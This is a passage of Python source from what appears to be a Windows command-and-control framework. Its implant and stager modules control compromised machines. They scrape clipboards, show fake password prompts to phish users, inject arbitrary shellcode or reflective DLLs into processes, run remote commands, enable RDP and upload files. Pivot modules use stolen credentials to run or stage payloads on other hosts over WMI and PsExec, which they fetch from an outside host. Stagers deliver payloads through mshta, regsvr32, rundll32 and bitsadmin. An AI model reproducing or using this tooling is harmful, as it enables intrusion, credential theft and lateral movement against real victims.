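        """When created without a concrete session (-1) the length was not computed by run(); do it here."""
        if self.session_id == -1:
            seconds = _video_length_seconds(self.options.get("VIDEOURL"))
            self.options.set("SECONDS", str(seconds + 1))

    def done(self):
        self.display()

    def display(self):
        self.results = "Completed"
        self.shell.print_plain(self.data)


class ThunderstruckImplant(core.implant.Implant):
    """Open a hidden Internet Explorer window on the target playing VIDEOURL."""

    NAME = "Thunderstruck"
    DESCRIPTION = "Opens hidden IE to the Thunderstruck YouTube video"
    AUTHORS = ["zerosum0x0"]
    STATE = "implant/fun/thunderstruck"

    def load(self):
        self.options.register("VIDEOURL", "https://www.youtube.com/watch?v=v2AC41dglnM", "YouTube video to play")
        self.options.register("SECONDS", "", "video length", hidden=True)

    def run(self):
        """Look up the video length from the server side, store it in SECONDS, then dispatch."""
        self.shell.print_status("Retrieving video length...")
        try:
            seconds = _video_length_seconds(self.options.get("VIDEOURL"))
        except (OSError, ValueError) as exc:
            # Previously an IndexError/URLError escaped run(); report it instead.
            self.shell.print_error("Could not determine video length: %s" % exc)
            return
        self.shell.print_status(f"Video length: {seconds} seconds")

        self.options.set("SECONDS", str(seconds + 1))

        payloads = {}
        payloads["js"] = "data/implant/fun/thunderstruck.js"

        self.dispatch(payloads, ThunderstruckJob)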
-------------------------------------------------------------------------------- /modules/implant/fun/voice.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class VoiceJob(core.job.Job):
    """Job side of the Voice implant: echoes whatever the zombie reported back."""

    def done(self):
        self.display()

    def display(self):
        # Report success and print the implant's output verbatim.
        self.results = "Completed"
        self.shell.print_plain(self.data)


class VoiceImplant(core.implant.Implant):
    """Make the target speak MESSAGE; the work is done by data/implant/fun/voice.js."""

    NAME = "Voice"
    DESCRIPTION = "Makes the computer speak a message."
    AUTHORS = ["RiskSense, Inc."]
    STATE = "implant/fun/voice"

    def load(self):
        self.options.register("MESSAGE", "I can't do that Dave", "message to speak")

    def job(self):
        return VoiceJob

    def run(self):
        # Only a JScript workload exists for this implant.
        workload = {"js": "data/implant/fun/voice.js"}
        self.dispatch(workload, self.job)
-------------------------------------------------------------------------------- /modules/implant/gather/clipboard.py: --------------------------------------------------------------------------------
import core.job
import core.implant
import uuid


class ClipboardJob(core.job.Job):
    """Job side of the clipboard scraper: prints and stores the reported clipboard text."""

    def done(self):
        self.display()

    def display(self):
        self.shell.print_plain("Clipboard contents:")
        self.shell.print_plain(self.data)
        # The raw clipboard text is the job result.
        self.results = self.data


class ClipboardImplant(core.implant.Implant):
    """Read the target's clipboard; the work is done by data/implant/gather/clipboard.js."""

    NAME = "Scrape Clipboard"
    DESCRIPTION = "Gets the contents of the clipboard"
    AUTHORS = ["RiskSense, Inc."]
    STATE = "implant/gather/clipboard"

    def load(self):
        # No options: the implant takes nothing from the operator.
        pass

    def job(self):
        return ClipboardJob

    def run(self):
        workload = {"js": "data/implant/gather/clipboard.js"}
        self.dispatch(workload, self.job)
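-------------------------------------------------------------------------------- /modules/implant/gather/enum_printers.py: --------------------------------------------------------------------------------
import core.implant
import core.job  # was missing: the file used core.job.Job while importing only core.implant


class EnumPrintersJob(core.job.Job):
    """Job side of the printer enumerator: prints and stores the reported list."""

    def done(self):
        self.display()

    def display(self):
        self.shell.print_plain("Printer Connections:")
        self.shell.print_plain(self.data)
        self.results = self.data


class EnumPrintersImplant(core.implant.Implant):
    """List printer connections on the target; the work is done by enum_printers.js."""

    NAME = "Enumerate Printer Connections"
    DESCRIPTION = "Enumerates all Printer Connections"
    AUTHORS = ["Tony M Lambert @ForensicITGuy"]
    STATE = "implant/gather/enum_printers"

    def load(self):
        # No operator-supplied options.
        pass

    def job(self):
        return EnumPrintersJob

    def run(self):
        payloads = {}
        payloads["js"] = "data/implant/gather/enum_printers.js"
        self.dispatch(payloads, self.job)


-------------------------------------------------------------------------------- /modules/implant/gather/enum_shares.py: --------------------------------------------------------------------------------
import core.implant


# Placeholder only: no NAME/STATE/run are defined, so nothing can be selected or
# dispatched from this module. The class name looks copied from an exec_cmd stub.
class ExecCmdImplant(core.implant.Implant):
    pass
-------------------------------------------------------------------------------- /modules/implant/gather/enum_users.py: --------------------------------------------------------------------------------
import core.implant
import core.job  # was missing: the file used core.job.Job while importing only core.implant


class EnumUsersJob(core.job.Job):
    """Collect user names reported one request at a time by enum_users.js, then print them."""

    def create(self):
        self.users = []

    def report(self, handler, data, sanitize = False):
        """Handle one report from the zombie: a user name, or the "Complete" sentinel."""
        user = data.decode()
        handler.reply(200)

        if user == "Complete":
            # Hand the sentinel to the base class (presumably where the job is
            # marked finished) and stop: it must not be recorded as a user,
            # which the original code did by falling through to the append.
            super(EnumUsersJob, self).report(handler, data, False)
            return

        # De-duplicate case-insensitively, keeping the first spelling seen.
        if user.lower() not in [u.lower() for u in self.users]:
            self.users.append(user)

    def done(self):
        """Flag domain admins with a trailing "*" (when domain info is loaded) and build the report."""
        if self.shell.domain_info:
            domain_admins = set()
            for key, info in self.shell.domain_info.items():
                # key is indexed at [0] and [1]; assumed to be a pair of domain
                # names (e.g. NetBIOS and DNS forms) -- verify against shell.domain_info.
                for admin in info["Domain Admins"]:
                    domain_admins.add(key[0].lower() + "\\" + admin.lower())
                    domain_admins.add(key[1].lower() + "\\" + admin.lower())
            self.users = [user + "*" if user.lower() in domain_admins else user for user in self.users]

        header = "Logged in users on " + self.ip
        self.results = "\n\n" + header + "\n" + "=" * len(header) + "\n"
        self.results += "\n".join(self.users)
        self.results += "\n"

        self.display()

    def display(self):
        self.print_good(self.results)


class EnumUsersImplant(core.implant.Implant):
    """Enumerate logged-in users on the target; the work is done by enum_users.js."""

    NAME = "Enum Users"
    DESCRIPTION = "Enumerates user sessions on the target system."
    AUTHORS = ["zerosum0x0", "TheNaterz"]
    STATE = "implant/gather/enum_users"

    def load(self):
        # No operator-supplied options.
        pass

    def job(self):
        return EnumUsersJob

    def run(self):
        payloads = {}
        payloads["js"] = "data/implant/gather/enum_users.js"

        self.dispatch(payloads, self.job)
-------------------------------------------------------------------------------- /modules/implant/gather/office_key.py: --------------------------------------------------------------------------------
import core.implant


# Placeholder only: no NAME/STATE/run are defined, so nothing can be selected or
# dispatched from this module. The class name looks copied from an exec_cmd stub.
class ExecCmdImplant(core.implant.Implant):
    pass
-------------------------------------------------------------------------------- /modules/implant/gather/windows_key.py: --------------------------------------------------------------------------------
import core.implant


# Placeholder only: no NAME/STATE/run are defined, so nothing can be selected or
# dispatched from this module. The class name looks copied from an exec_cmd stub.
class ExecCmdImplant(core.implant.Implant):
    pass
-------------------------------------------------------------------------------- /modules/implant/inject/reflectdll_excel.py: --------------------------------------------------------------------------------
import core.implant
import core.job  # was missing: the file used core.job.Job while importing only core.implant


class ExcelReflectJob(core.job.Job):
    """Job side of the Excel reflective-DLL loader; it reports completion and prints nothing."""

    def done(self):
        self.results = "Completed"
        self.display()

    def display(self):
        # Intentionally silent: the job has no output of its own to show.
        pass

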
class ExcelReflectImplant(core.implant.Implant): 13 | 14 | NAME = "Reflective DLL via Excel" 15 | DESCRIPTION = "Executes an arbitrary reflective DLL." 16 | AUTHORS = ["RiskSense, Inc."] 17 | STATE = "implant/inject/reflectdll_excel" 18 | 19 | def load(self): 20 | self.options.register("DLLPATH", "", "the DLL to inject", required=True) 21 | 22 | def job(self): 23 | return ExcelReflectJob 24 | 25 | def run(self): 26 | workloads = {} 27 | #workloads["vbs"] = self.load_script("data/implant/manage/enable_rdesktop.vbs", self.options) 28 | workloads["js"] = "data/implant/inject/reflectdll_excel.js" 29 | 30 | self.dispatch(workloads, self.job) 31 | -------------------------------------------------------------------------------- /modules/implant/inject/shellcode_dotnet2js.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | import core.job 3 | import base64 4 | import os.path 5 | import binascii 6 | 7 | class SDotNet2JSJob(core.job.Job): 8 | def create(self): 9 | self.errstat = 0 10 | self.options.set("SC_B64", self.scb64(self.options.get("SC_HEX"))) 11 | 12 | def scb64(self, path): 13 | if os.path.isfile(path): 14 | with open(path, 'r') as fileobj: 15 | text = base64.b64encode(binascii.unhexlify(fileobj.read())).decode() 16 | else: 17 | text = base64.b64encode(binascii.unhexlify(path)).decode() 18 | 19 | index = 0 20 | ret = '"'; 21 | for c in text: 22 | ret += str(c) 23 | index += 1 24 | if index % 100 == 0: 25 | ret += '"+\r\n"' 26 | 27 | ret += '"' 28 | return ret 29 | 30 | def report(self, handler, data, sanitize = False): 31 | data = data.decode('latin-1') 32 | 33 | if len(data) == 0: 34 | handler.reply(200) 35 | return 36 | 37 | if data == "Complete" and self.errstat != 1: 38 | super(SDotNet2JSJob, self).report(handler, data) 39 | 40 | #self.print_good(data) 41 | 42 | handler.reply(200) 43 | 44 | def done(self): 45 | self.results = "Complete" 46 | self.display() 47 | 48 | def display(self): 49 | try: 50 | 
self.print_good(self.data) 51 | except: 52 | pass 53 | #self.shell.print_plain(str(self.errno)) 54 | 55 | class SDotNet2JSImplant(core.implant.Implant): 56 | 57 | NAME = "Shellcode via DotNet2JS" 58 | DESCRIPTION = "Executes arbitrary shellcode using the DotNet2JS technique. Inject shellcode into a host process via createremotethread as a new thread." 59 | AUTHORS = ["zerosum0x0", "TheNaterz", "tiraniddo", "psmitty"] 60 | STATE = "implant/inject/shellcode_dotnet2js" 61 | 62 | def load(self): 63 | self.options.register("DLLCOMMANDS", "", "string to pass to dll if needed", required=False) 64 | self.options.register("SC_HEX", "", "relative path to shellcode/dll hex or paste hex string", required=True) 65 | self.options.register("SC_B64", "", "shellcode in base64", advanced=True) 66 | self.options.register("DLLOFFSET", "0", "Offset to the reflective loader", advanced=True) 67 | self.options.register("PID", "0", "process ID to inject into (0 = current process)", required=True) 68 | 69 | def job(self): 70 | return SDotNet2JSJob 71 | 72 | def run(self): 73 | workloads = {} 74 | workloads["js"] = "data/implant/inject/shellcode_dotnet2js.js" 75 | 76 | self.dispatch(workloads, self.job) 77 | -------------------------------------------------------------------------------- /modules/implant/inject/shellcode_excel.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | import core.job 3 | import string 4 | 5 | class ExcelShellcodeJob(core.job.Job): 6 | def done(self): 7 | self.results = "Completed" 8 | self.display() 9 | 10 | def display(self): 11 | pass 12 | #self.shell.print_plain(str(self.errno)) 13 | 14 | class ExcelShellcodeImplant(core.implant.Implant): 15 | 16 | NAME = "Shellcode via Excel" 17 | DESCRIPTION = "Executes arbitrary shellcode using Excel COM objects" 18 | AUTHORS = ["zerosum0x0"] 19 | STATE = "implant/inject/shellcode_excel" 20 | 21 | def load(self): 22 | self.options.register("SHELLCODE", "90c3", "in 
ASCII hex format (e.g.: 31c0c3)", required=True) 23 | self.options.register("SHELLCODEDECCSV", "", "decimal CSV shellcode", hidden=True) 24 | self.options.register("VBACODE", "", ".vba source", hidden=True) 25 | 26 | # todo: we need to createprocess/remotethread instead of createthread 27 | # but heres a quick fix that will let us migrate 28 | self.options.register("SLEEP", "30000", "how long to wait for shellcode to run") 29 | 30 | def job(self): 31 | return ExcelShellcodeJob 32 | 33 | def run(self): 34 | shellcode = self.options.get("SHELLCODE") 35 | 36 | if not self.validate_shellcode(shellcode): 37 | self.shell.print_error("SHELLCODE option is an invalid hex string.") 38 | return 39 | 40 | self.options.set("SHELLCODEDECCSV", self.convert_shellcode(shellcode)) 41 | 42 | vba = self.loader.load_script("data/implant/inject/shellcode.vba", self.options) 43 | vba = vba.decode().replace("\n", "\\n") 44 | 45 | self.options.set("VBACODE", vba) 46 | 47 | workloads = {} 48 | workloads["js"] = self.loader.load_script("data/implant/inject/shellcode_excel.js", self.options) 49 | 50 | self.dispatch(workloads, self.job) 51 | -------------------------------------------------------------------------------- /modules/implant/manage/enable_rdesktop.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class EnableRDesktopJob(core.job.Job): 6 | def create(self): 7 | mode = "0" if self.options.get("ENABLE") == "true" else "1" 8 | self.options.set("MODE", mode) 9 | def done(self): 10 | self.results = "Completed" 11 | self.display() 12 | 13 | def display(self): 14 | pass 15 | #self.shell.print_plain(str(self.errno)) 16 | 17 | class EnableRDesktopImplant(core.implant.Implant): 18 | 19 | NAME = "Enable Remote Desktop" 20 | DESCRIPTION = "Enables RDP on the target system." 
21 | AUTHORS = ["RiskSense, Inc."] 22 | STATE = "implant/manage/enable_rdesktop" 23 | 24 | def load(self): 25 | self.options.register("ENABLE", "true", "toggle to enable or disable", enum=["true", "false"]) 26 | self.options.register("MODE", "", "the value for this script", hidden=True) 27 | 28 | def job(self): 29 | return EnableRDesktopJob 30 | 31 | def run(self): 32 | workloads = {} 33 | #workloads["vbs"] = self.load_script("data/implant/manage/enable_rdesktop.vbs", self.options) 34 | workloads["js"] = "data/implant/manage/enable_rdesktop.js" 35 | 36 | self.dispatch(workloads, self.job) 37 | -------------------------------------------------------------------------------- /modules/implant/manage/exec_cmd.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class ExecCmdJob(core.job.Job): 6 | def create(self): 7 | self.options.set("FCMD", self.options.get('CMD').replace("\\", "\\\\").replace('"', '\\"')) 8 | self.options.set("FDIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"')) 9 | 10 | def report(self, handler, data, sanitize = False): 11 | self.results = self.decode_downloaded_data(data, handler.get_header("encoder", 1252), True).decode("cp"+handler.get_header("shellchcp", '437')) 12 | handler.reply(200) 13 | self.completed = 4 14 | self.done() 15 | 16 | def done(self): 17 | self.display() 18 | 19 | def display(self): 20 | self.shell.print_plain("Result for `%s`:" % self.options.get('CMD').replace('\\"', '"').replace("\\\\", "\\")) 21 | self.shell.print_plain(self.results) 22 | 23 | class ExecCmdImplant(core.implant.Implant): 24 | 25 | NAME = "Execute Command" 26 | DESCRIPTION = "Executes a command on the target system." 
27 | AUTHORS = ["RiskSense, Inc."] 28 | STATE = "implant/manage/exec_cmd" 29 | 30 | def load(self): 31 | self.options.register("CMD", "hostname", "command to run") 32 | self.options.register("OUTPUT", "true", "retrieve output?", enum=["true", "false"]) 33 | self.options.register("DIRECTORY", "%TEMP%", "writeable directory for output", required=False) 34 | self.options.register("FCMD", "", "cmd after escaping", hidden=True) 35 | self.options.register("FDIRECTORY", "", "dir after escaping", hidden=True) 36 | # self.options.register("FILE", "", "random uuid for file name", hidden=True) 37 | 38 | def job(self): 39 | return ExecCmdJob 40 | 41 | def run(self): 42 | stuff = self.options.get("CMD").lower() 43 | if "powershell" in stuff and self.shell.confirm_prompt("Really run PowerShell? HET! y/N:") != "y": 44 | return 45 | 46 | payloads = {} 47 | #payloads["vbs"] = self.load_script("data/implant/manage/exec_cmd.vbs", self.options) 48 | payloads["js"] = "data/implant/manage/exec_cmd.js" 49 | 50 | self.dispatch(payloads, self.job) 51 | -------------------------------------------------------------------------------- /modules/implant/manage/killav.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | 3 | class ExecCmdImplant(core.implant.Implant): 4 | pass 5 | -------------------------------------------------------------------------------- /modules/implant/phish/password_box.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class PasswordBoxJob(core.job.Job): 6 | def done(self): 7 | self.results = self.data 8 | self.display() 9 | 10 | def display(self): 11 | self.shell.print_plain("Input contents:") 12 | self.shell.print_plain(self.data) 13 | 14 | class PasswordBoxImplant(core.implant.Implant): 15 | 16 | NAME = "Password Box" 17 | DESCRIPTION = "Try to phish a user" 18 | AUTHORS = ["zerosum0x0"] 19 | STATE = 
"implant/phish/password_box" 20 | 21 | def load(self): 22 | self.options.register("Message", "You must enter your password to continue...", "Displayed to user") 23 | 24 | def job(self): 25 | return PasswordBoxJob 26 | 27 | def run(self): 28 | payloads = {} 29 | payloads["js"] = "data/implant/phish/password_box.js" 30 | self.dispatch(payloads, self.job) 31 | -------------------------------------------------------------------------------- /modules/implant/pivot/exec_psexec.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | import os.path 5 | 6 | 7 | class PsExecLiveJob(core.job.Job): 8 | def create(self): 9 | cred_id = self.options.get("CREDID") 10 | if cred_id: 11 | key = self.shell.creds_keys[int(cred_id)] 12 | smbuser = self.shell.creds[key]["Username"] 13 | smbpass = self.shell.creds[key]["Password"] 14 | smbdomain = self.shell.creds[key]["Domain"] 15 | self.options.set("SMBUSER", smbuser) 16 | if not smbuser: 17 | self.shell.print_warning("Cred has no Username!") 18 | self.options.set("SMBPASS", smbpass) 19 | if not smbpass: 20 | self.shell.print_warning("Cred has no Password!") 21 | self.options.set("SMBDOMAIN", smbdomain) 22 | if not smbdomain: 23 | self.shell.print_warning("Cred has no Domain!") 24 | self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"')) 25 | 26 | def done(self): 27 | self.results = "Completed" 28 | self.display() 29 | 30 | def display(self): 31 | pass 32 | #self.shell.print_plain("Result for `%s`:" % self.options.get('CMD')) 33 | #self.shell.print_plain(self.data) 34 | 35 | class PsExecLiveImplant(core.implant.Implant): 36 | 37 | NAME = "PsExec_Live" 38 | DESCRIPTION = "Executes a command on another system, utilizing live.sysinternals.com publicly hosted tools." 
39 | AUTHORS = ["RiskSense, Inc."] 40 | STATE = "implant/pivot/exec_psexec" 41 | 42 | def load(self): 43 | self.options.register("CMD", "hostname", "command to run") 44 | self.options.register("RHOST", "", "name/IP of the remote") 45 | self.options.register("SMBUSER", "", "username for login") 46 | self.options.register("SMBPASS", "", "password for login") 47 | self.options.register("SMBDOMAIN", ".", "domain for login") 48 | self.options.register("CREDID", "", "cred id from creds") 49 | #self.options.register("PAYLOAD", "", "payload to stage") 50 | self.options.register("RPATH", "\\\\\\\\live.sysinternals.com@SSL\\\\tools\\\\", "path to psexec.exe") 51 | self.options.register("DIRECTORY", "%TEMP%", "writeable directory for output", required=False) 52 | # self.options.register("FILE", "", "random uuid for file name", hidden=True) 53 | 54 | def job(self): 55 | return PsExecLiveJob 56 | 57 | def run(self): 58 | payloads = {} 59 | payloads["js"] = "data/implant/pivot/exec_psexec.js" 60 | self.dispatch(payloads, self.job) 61 | -------------------------------------------------------------------------------- /modules/implant/pivot/exec_wmi.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | 4 | class SWbemServicesJob(core.job.Job): 5 | def done(self): 6 | self.results = "PID Start Code: %s" % self.data 7 | self.display() 8 | 9 | def display(self): 10 | self.shell.print_plain("PID Start Code: %s" % self.data) 11 | 12 | class SWbemServicesImplant(core.implant.Implant): 13 | 14 | NAME = "WMI SWbemServices" 15 | DESCRIPTION = "Executes a command on another system." 
16 | AUTHORS = ["zerosum0x0"] 17 | STATE = "implant/pivot/exec_wmi" 18 | 19 | def load(self): 20 | self.options.register("CMD", "hostname", "command to run") 21 | self.options.register("RHOST", "", "name/IP of the remote") 22 | self.options.register("SMBUSER", "", "username for login") 23 | self.options.register("SMBPASS", "", "password for login") 24 | self.options.register("SMBDOMAIN", ".", "domain for login") 25 | self.options.register("CREDID", "", "cred id from creds") 26 | 27 | def job(self): 28 | return SWbemServicesJob 29 | 30 | def run(self): 31 | cred_id = self.options.get("CREDID") 32 | if cred_id: 33 | key = self.shell.creds_keys[int(cred_id)] 34 | smbuser = self.shell.creds[key]["Username"] 35 | smbpass = self.shell.creds[key]["Password"] 36 | smbdomain = self.shell.creds[key]["Domain"] 37 | self.options.set("SMBUSER", smbuser) 38 | if not smbuser: 39 | self.shell.print_warning("Cred has no Username!") 40 | self.options.set("SMBPASS", smbpass) 41 | if not smbpass: 42 | self.shell.print_warning("Cred has no Password!") 43 | self.options.set("SMBDOMAIN", smbdomain) 44 | if not smbdomain: 45 | self.shell.print_warning("Cred has no Domain!") 46 | 47 | payloads = {} 48 | payloads["js"] = "data/implant/pivot/exec_wmi.js" 49 | 50 | self.dispatch(payloads, self.job) 51 | -------------------------------------------------------------------------------- /modules/implant/pivot/exec_wmic.py: -------------------------------------------------------------------------------- 1 | # wmic /node:~IP~ /user:~SMBDOMAIN~\~SMBUSER~ /password:~SMBPASS~ process call create "cmd /c ~CMD~" 2 | import core.implant 3 | 4 | class ExecCmdImplant(core.implant.Implant): 5 | pass 6 | -------------------------------------------------------------------------------- /modules/implant/pivot/stage_wmi.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | 4 | # todo: inherit the exec_wmi module's jobs and implant 
instead of copypasta 5 | 6 | class SWbemServicesJob(core.job.Job): 7 | def done(self): 8 | self.results = "PID Start Code: %s" % self.data 9 | self.display() 10 | 11 | def display(self): 12 | self.shell.print_plain("PID Start Code: %s" % self.data) 13 | 14 | class SWbemServicesImplant(core.implant.Implant): 15 | 16 | NAME = "WMI SWbemServices" 17 | DESCRIPTION = "Stages another system." 18 | AUTHORS = ["zerosum0x0"] 19 | STATE = "implant/pivot/stage_wmi" 20 | 21 | def load(self): 22 | self.options.register("CMD", "hostname", "command to run", hidden=True) 23 | self.options.register("RHOST", "", "name/IP of the remote") 24 | self.options.register("SMBUSER", "", "username for login") 25 | self.options.register("SMBPASS", "", "password for login") 26 | self.options.register("SMBDOMAIN", ".", "domain for login") 27 | self.options.register("CREDID", "", "cred id from creds") 28 | self.options.register("PAYLOAD", "", "payload to stage") 29 | 30 | def job(self): 31 | return SWbemServicesJob 32 | 33 | def run(self): 34 | id = self.options.get("PAYLOAD") 35 | payload = self.load_payload(id) 36 | 37 | if payload is None: 38 | self.shell.print_error("Payload %s not found." 
% id) 39 | return 40 | 41 | self.options.set("CMD", payload) 42 | 43 | cred_id = self.options.get("CREDID") 44 | 45 | if cred_id: 46 | key = self.shell.creds_keys[int(cred_id)] 47 | smbuser = self.shell.creds[key]["Username"] 48 | smbpass = self.shell.creds[key]["Password"] 49 | smbdomain = self.shell.creds[key]["Domain"] 50 | self.options.set("SMBUSER", smbuser) 51 | if not smbuser: 52 | self.shell.print_warning("Cred has no Username!") 53 | self.options.set("SMBPASS", smbpass) 54 | if not smbpass: 55 | self.shell.print_warning("Cred has no Password!") 56 | self.options.set("SMBDOMAIN", smbdomain) 57 | if not smbdomain: 58 | self.shell.print_warning("Cred has no Domain!") 59 | 60 | payloads = {} 61 | payloads["js"] = "data/implant/pivot/exec_wmi.js" 62 | 63 | self.dispatch(payloads, self.job) 64 | -------------------------------------------------------------------------------- /modules/implant/util/multi_module.py: -------------------------------------------------------------------------------- 1 | import core.implant 2 | import time 3 | import string 4 | 5 | class MultiModuleImplant(core.implant.Implant): 6 | 7 | NAME = "Multi Module Execution" 8 | DESCRIPTION = "Run multiple modules in succession" 9 | AUTHORS = ["TheNaterz"] 10 | STATE = "implant/util/multi_module" 11 | 12 | def load(self): 13 | self.options.register("MODULES", "", "Modules to run in succession (comma seperated)", required = True) 14 | self.options.register("DELAY", "0", "Number of seconds between each job", required = True) 15 | 16 | def run(self): 17 | for module in self.options.get("MODULES").split(","): 18 | plugin = self.shell.plugins[module.strip()] 19 | old_zombie = plugin.options.get("ZOMBIE") 20 | plugin.options.set("ZOMBIE", self.options.get("ZOMBIE")) 21 | plugin.run() 22 | plugin.options.set("ZOMBIE", old_zombie) 23 | 24 | delay = int(self.options.get("DELAY")) 25 | if delay > 0: 26 | time.sleep(delay) 27 | 28 | 
-------------------------------------------------------------------------------- /modules/implant/util/upload_file.py: -------------------------------------------------------------------------------- 1 | import core.job 2 | import core.implant 3 | import uuid 4 | 5 | class UploadFileJob(core.job.Job): 6 | def create(self): 7 | last = self.options.get("LFILE").split("/")[-1] 8 | self.options.set("FILE", last) 9 | self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"')) 10 | 11 | def report(self, handler, data): 12 | if handler.get_header('X-UploadFileJob', False): 13 | with open(self.options.get("LFILE"), "rb") as f: 14 | fdata = f.read() 15 | 16 | headers = {} 17 | headers['Content-Type'] = 'application/octet-stream' 18 | headers['Content-Length'] = len(fdata) 19 | handler.reply(200, fdata, headers) 20 | return 21 | 22 | super(UploadFileJob, self).report(handler, data) 23 | 24 | def done(self): 25 | self.results = self.data 26 | 27 | def display(self): 28 | pass 29 | 30 | class UploadFileImplant(core.implant.Implant): 31 | 32 | NAME = "Upload File" 33 | DESCRIPTION = "Uploads a local file the remote system." 
34 | AUTHORS = ["RiskSense, Inc."] 35 | STATE = "implant/util/upload_file" 36 | 37 | def load(self): 38 | 39 | self.options.register("LFILE", "", "local file to upload") 40 | #self.options.register("FILE", "", "file name once uploaded") 41 | #self.options.register("EXEC", "false", "execute file?", enum=["true", "false"]) 42 | #self.options.register("OUTPUT", "false", "get output of exec?", enum=["true", "false"]) 43 | self.options.register("DIRECTORY", "%TEMP%", "writeable directory", required=False) 44 | self.options.register("FILE", "", "", hidden = True) 45 | 46 | def job(self): 47 | return UploadFileJob 48 | 49 | def run(self): 50 | payloads = {} 51 | #payloads["vbs"] = self.load_script("data/implant/util/upload_file.vbs", self.options) 52 | payloads["js"] = "data/implant/util/upload_file.js" 53 | 54 | self.dispatch(payloads, self.job) 55 | -------------------------------------------------------------------------------- /modules/stager/js/bitsadmin.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class BitsadminStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript Bitsadmin Stager" 7 | DESCRIPTION = "Listens for new sessions, using JScript Bitsadmin for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def __init__(self, shell): 13 | super(BitsadminStager, self).__init__(shell) # stupid hack inc! 
14 | self.options.set("ENDPOINTTYPE", ".wsf") 15 | self.options.set("OBFUSCATE", "") 16 | 17 | def load(self): 18 | #self.options.set("SRVPORT", 9999) 19 | self.port = 9995 20 | 21 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 22 | self.stage = core.loader.load_script('data/stager/js/stage.js') 23 | self.stagetemplate = core.loader.load_script("data/stager/js/bitsadmin/template.wsf") 24 | self.stagecmd = core.loader.load_script("data/stager/js/bitsadmin/bitsadmin.cmd") 25 | self.forktemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 26 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 27 | self.workload = "js" 28 | -------------------------------------------------------------------------------- /modules/stager/js/disk.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class DiskStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript Disk Stager" 7 | DESCRIPTION = "Listens for new sessions, using disk for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def load(self): 13 | #self.options.set("SRVPORT", 9996) 14 | self.port = 9996 15 | 16 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 17 | self.stage = core.loader.load_script('data/stager/js/stage.js') 18 | self.stagetemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 19 | self.stagecmd = core.loader.load_script("data/stager/js/mshta/mshta.cmd") 20 | self.forktemplate = self.stagetemplate 21 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 22 | self.workload = "js" 23 | -------------------------------------------------------------------------------- /modules/stager/js/mshta.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class MSHTAStager(core.stager.StagerWizard): 5 | 6 
| NAME = "JScript MSHTA Stager" 7 | DESCRIPTION = "Listens for new sessions, using JScript MSHTA for payloads" 8 | AUTHORS = ['zerosum0x0'] 9 | 10 | WORKLOAD = "js" 11 | 12 | def load(self): 13 | #self.options.set("SRVPORT", 9999) 14 | self.port = 9999 15 | 16 | self.workload = "js" 17 | 18 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 19 | self.stage = core.loader.load_script('data/stager/js/stage.js') 20 | self.stagetemplate = core.loader.load_script("data/stager/js/mshta/template.hta") 21 | self.stagecmd = core.loader.load_script("data/stager/js/mshta/mshta.cmd") 22 | self.forktemplate = self.stagetemplate 23 | self.forkcmd = core.loader.load_script("data/stager/js/rundll32/rundll32.cmd") 24 | -------------------------------------------------------------------------------- /modules/stager/js/regsvr.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class MSHTAStager(core.stager.StagerWizard): 5 | 6 | NAME = "JScript RegSvr Stager" 7 | DESCRIPTION = "Listens for new sessions, using COM+ RegSvr for payloads" 8 | AUTHORS = [ 'subTee', # discovery 9 | 'zerosum0x0' # stager 10 | ] 11 | 12 | WORKLOAD = "js" 13 | 14 | def load(self): 15 | #self.options.set("SRVPORT", 9998) 16 | self.port = 9998 17 | 18 | self.stdlib = core.loader.load_script('data/stager/js/stdlib.js') 19 | self.stage = core.loader.load_script('data/stager/js/stage.js') 20 | self.stagetemplate = core.loader.load_script("data/stager/js/regsvr/template.sct") 21 | self.stagecmd = core.loader.load_script("data/stager/js/regsvr/regsvr.cmd") 22 | self.forktemplate = self.stagetemplate 23 | self.forkcmd = self.stagecmd 24 | self.workload = "js" 25 | -------------------------------------------------------------------------------- /modules/stager/js/rundll32_js.py: -------------------------------------------------------------------------------- 1 | import core.stager 2 | import core.loader 3 | 4 | class 
